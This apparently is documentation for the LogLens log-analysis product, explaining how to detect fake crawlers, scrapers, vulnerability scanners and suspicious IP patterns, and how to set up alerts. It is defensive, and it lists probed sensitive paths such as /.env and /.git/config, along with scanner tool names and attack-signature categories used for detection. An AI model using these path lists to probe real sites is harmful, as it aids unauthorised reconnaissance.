Security & Threat Detection with Server Logs
The Fake Bot Problem
User-Agent strings are one of the most commonly relied-upon signals for identifying crawlers, but they are trivially spoofed. Any HTTP client can set its User-Agent to anything it wants, and many attackers take advantage of this.
Attackers impersonate Googlebot and other legitimate crawlers for several reasons:
- Faster responses — many sites serve pre-rendered or cached content to known bots, giving faster access to page content
- Unblocked access — bot-specific allow lists often bypass geo-blocks, paywalls, or login walls
- Bypassed rate limits — sites frequently exempt recognised crawlers from rate limiting, allowing aggressive scraping
- Evasion of security rules — WAF rules and firewall policies often whitelist known bot User-Agents
Never trust User-Agent strings alone. Always verify crawler identity by checking the request's source IP against the bot operator's officially published IP ranges. LogLens does this verification automatically for all major crawlers.
Identifying Content Scrapers
Content scrapers have distinctive patterns in server logs that set them apart from legitimate users and crawlers. Once you know what to look for, they become straightforward to spot.
Rapid sequential requests
Scrapers typically make dozens or hundreds of requests per minute from a single IP or a small cluster of IPs. Legitimate users rarely exceed a few pages per minute, and even aggressive crawlers like Googlebot respect crawl-delay directives.
No asset loading
Scrapers request HTML pages only. They do not load CSS, JavaScript, images, fonts, or any other assets that a real browser would need to render the page. If you see an IP fetching page after page with zero corresponding asset requests, it is almost certainly a scraper.
Systematic URL traversal
Look for request patterns that follow a predictable structure: alphabetical ordering, paginated sequences (/page/1, /page/2, /page/3...), or the exact order URLs appear in your sitemap. Human browsing is inherently irregular; machine traversal is not.
Missing referrer and cookie data
Scrapers rarely send referrer headers or manage cookies. A stream of requests with empty Referer headers and no cookies, combined with the patterns above, is a strong signal.
Cloud provider IP addresses
Most scrapers run on cloud infrastructure. Requests originating from AWS, Google Cloud Platform, or Microsoft Azure IP ranges — especially when combined with the patterns above — are highly likely to be automated scraping.
LogLens automatically flags IPs that exhibit scraping patterns. Use the IP Analysis page to filter by cloud provider ASN and cross-reference with request rates for fast identification.
Vulnerability Scanning Patterns
Automated vulnerability scanners probe for common weaknesses by requesting paths associated with known exploits, exposed configuration files, and popular admin interfaces. These paths should never appear in legitimate traffic.
Watch for request surges to sensitive paths
- /wp-login.php
- /wp-admin/
- /.env
- /config.yml
- /.git/config
- /api/v1/users
- /graphql
- /swagger.json
- /api-docs
A surge of 404 responses to sensitive paths is one of the clearest indicators of automated vulnerability scanning. These requests typically arrive in bursts — tens or hundreds within a few minutes — and often originate from a single IP or a small set of rotating IPs.
Suspicious IP Pattern Detection
Beyond specific attack signatures, certain IP-level patterns warrant immediate investigation.
Volume anomalies
A single IP making 1,000 or more requests per hour is abnormal for almost any website. Legitimate users rarely exceed a few hundred page views in a session, even on high-engagement sites.
Rotating IPs from the same subnet
Sophisticated attackers rotate through IP addresses within the same /24 or /16 subnet to avoid per-IP rate limits. When you see multiple IPs from the same block all making elevated requests, treat them as a single actor.
Traffic from unexpected regions
If your site primarily serves users in North America and Europe, a sudden spike of requests from a region where you have no audience is worth investigating — especially if paired with other suspicious signals.
Unusual timing patterns
Requests arriving between 2:00 AM and 5:00 AM local time with User-Agent strings that claim to be mainstream browsers (Chrome, Firefox, Safari) are suspicious. Real users are largely asleep; automated tools are not.
Use LogLens IP Analysis to sort by request volume and filter by time of day. Combine with geographic filters to quickly surface the patterns described above.
Setting Up Effective Alerts
Detection is only useful if it surfaces threats quickly enough to act on them. LogLens ships five security-relevant alerts that cover the patterns above; all are enabled by default.
Automated Hacking Probe
Looks for the exact patterns described in Vulnerability Scanning Patterns: requests to known-vulnerable paths (/.env, /wp-config.php, /.git/config, etc.), known scanner user-agents (sqlmap, nuclei, nikto, gobuster), and attack signatures in URLs (SQL injection, path traversal, XSS, Log4Shell, command injection). One alert is fired per source IP per six-hour cooldown window so a single sustained scan doesn’t produce hundreds of emails.
The alert is automatically promoted to critical when any probe gets a 200 or 30x response — that means the targeted resource may exist on your origin and you should audit immediately.
Exposed Secret in URL
Scans your URLs daily for tokens, API keys, JWTs, AWS access keys, Stripe live keys, and similar high-precision patterns. Anything found is reported with the secret value redacted (since you already have the original in your logs — the alert email shouldn’t duplicate the leak). Treat any finding as compromised: rotate the value first, then patch the source (form GET vs. POST, leaky webhook handshake, env var rendered client-side).
Massive Traffic Spike
Fires when traffic surges far above your baseline. The alert email lists the top-hit URLs — concentrated on a few content paths usually means viral or press traffic; concentrated on attack endpoints (/login, /search, /api/...) usually means DDoS or aggressive scraping.
Bot Impersonation Surge
Fires when a spike of bots claim to be Googlebot/Bingbot/etc. but originate from IPs that don’t belong to those crawlers. This is the bread-and-butter signal for scrapers forging UAs to bypass robots.txt.
Server Error Spike (5xx)
An attack that’s actually impacting availability will show up here even before the traffic alert fires — an origin straining under scraping or a fuzzer triggering unhandled errors will push the 5xx rate up sharply.
The defaults are set conservatively to minimise false positives. If you want earlier detection on a specific category, raise the check frequency for that alert in Alerts › Settings rather than lowering the trigger threshold — tighter thresholds usually create more noise than signal.
Response Strategies
Different threat types call for different responses. Acting quickly with the right approach prevents damage while avoiding collateral impact on legitimate traffic.
| Threat | Recommended Response | Details |
|---|---|---|
| Fake bots | Block at CDN/edge | Use Cloudflare WAF rules or AWS WAF to block IPs that claim a bot User-Agent but fail IP verification |
| Content scrapers | Rate limit | Enforce 60 requests per minute for unverified clients; tighten further for repeat offenders |
| Vulnerability scanners | Block + alert | Block the source IPs and investigate the specific paths being targeted to confirm no exposure |
| Credential stuffing | Rate limit + CAPTCHA | Apply strict rate limits to authentication endpoints and require CAPTCHA after failed attempts |
Security Review Cadence
Effective security monitoring is a habit, not a one-time setup. Establish a regular review cadence to stay ahead of evolving threats.
Weekly
- Review top IPs by request volume and check for new unverified high-volume sources
- Check the 404 report for new sensitive paths being probed
- Verify that active alerts fired correctly (or confirm no events warranted them)
Monthly
- Audit the full bot list — look for new bot User-Agent strings that appeared this month
- Review rate-limit and block rules for relevance; remove blocks that are no longer necessary
- Check alert thresholds against current traffic levels and adjust if your baseline has shifted
Quarterly
- Full security posture review: compare current threat landscape to previous quarter
- Update firewall rules and WAF managed rule sets
- Review geographic access policies if your audience has shifted
- Validate that all sensitive paths return proper responses (not leaked configuration data)